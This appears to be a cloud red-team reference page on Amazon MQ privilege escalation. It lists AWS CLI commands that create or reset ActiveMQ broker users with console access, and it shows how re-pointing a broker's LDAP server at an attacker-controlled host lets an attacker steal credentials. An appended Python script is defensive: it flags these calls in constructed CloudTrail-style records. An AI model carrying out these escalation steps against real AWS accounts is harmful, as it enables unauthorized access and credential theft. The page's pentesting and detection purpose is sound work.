AWS - MQ Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

MQ

For more information about MQ check:

mq:ListBrokers, mq:CreateUser

With those permissions you can create a new user in an ActiveMQ broker (this doesn't work in RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Potential Impact: Access sensitive info navigating through ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

With those permissions you can update an existing user in an ActiveMQ broker, setting a new password and console access (this doesn't work in RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Potential Impact: Access sensitive info navigating through ActiveMQ

mq:ListBrokers, mq:UpdateBroker

If a broker is using LDAP for authorization with ActiveMQ, it's possible to change the configuration of the LDAP server used to one controlled by the attacker. This way the attacker will be able to steal all the credentials being sent through LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

If you could somehow find the original credentials used by ActiveMQ, you could perform a MitM: steal the creds, use them against the original server, and relay the response (maybe just reusing the stolen credentials would be enough to do this).

Potential Impact: Steal ActiveMQ credentials
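
A defender-side check for the three paths above, as an added example that is not part of the original page: it scans CloudTrail-style records for CreateUser, UpdateUser, and UpdateBroker calls that point a broker at an LDAP host outside an allowlist. The eventSource value, the requestParameters field names (brokerId, username, consoleAccess, ldapServerMetadata.hosts), the allowlist and the sample records are assumptions constructed for illustration.

```python
MQ_SOURCE = "amazonmq.amazonaws.com"  # assumed CloudTrail eventSource for Amazon MQ

def review(events, approved_ldap_hosts):
    """Return (actor, broker, reason) tuples for Amazon MQ changes worth triaging."""
    findings = []
    for ev in events:
        if ev.get("eventSource") != MQ_SOURCE:
            continue
        params = ev.get("requestParameters") or {}
        name = ev.get("eventName")
        reason = None
        if name == "CreateUser":
            reason = "broker user created: " + str(params.get("username"))
            if params.get("consoleAccess"):
                reason += " (console access)"
        elif name == "UpdateUser":
            reason = "broker user changed: " + str(params.get("username"))
        elif name == "UpdateBroker" and "ldapServerMetadata" in params:
            # Only LDAP re-pointing matters here; other broker updates are ignored.
            hosts = set((params["ldapServerMetadata"] or {}).get("hosts") or [])
            unknown = sorted(hosts - set(approved_ldap_hosts))
            if unknown:
                reason = "LDAP server not on allowlist: " + ", ".join(unknown)
        if reason:
            if ev.get("errorCode"):  # denied or failed attempts are still a signal
                reason += " [call failed: " + ev["errorCode"] + "]"
            actor = (ev.get("userIdentity") or {}).get("arn", "unknown")
            findings.append((actor, params.get("brokerId", "unknown"), reason))
    return findings

def make_event(name, params, source=MQ_SOURCE):
    """Build a constructed CloudTrail-style record (hypothetical helper)."""
    return {"eventSource": source, "eventName": name, "requestParameters": params,
            "userIdentity": {"arn": "arn:aws:iam::111122223333:user/example-dev"}}

# Constructed sample records, not real logs.
SAMPLE = [
    make_event("CreateUser", {"brokerId": "b-example", "username": "svc-new", "consoleAccess": True}),
    make_event("UpdateUser", {"brokerId": "b-example", "username": "admin"}),
    make_event("UpdateBroker", {"brokerId": "b-example", "ldapServerMetadata": {"hosts": ["ldap.corp.example"]}}),
    make_event("UpdateBroker", {"brokerId": "b-example", "ldapServerMetadata": {"hosts": ["ldap.other.example"]}}),
    make_event("UpdateBroker", {"brokerId": "b-example", "autoMinorVersionUpgrade": True}),
    make_event("PutObject", {"bucketName": "example"}, source="s3.amazonaws.com"),
]

if __name__ == "__main__":
    for finding in review(SAMPLE, approved_ldap_hosts={"ldap.corp.example"}):
        print(finding)
```
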
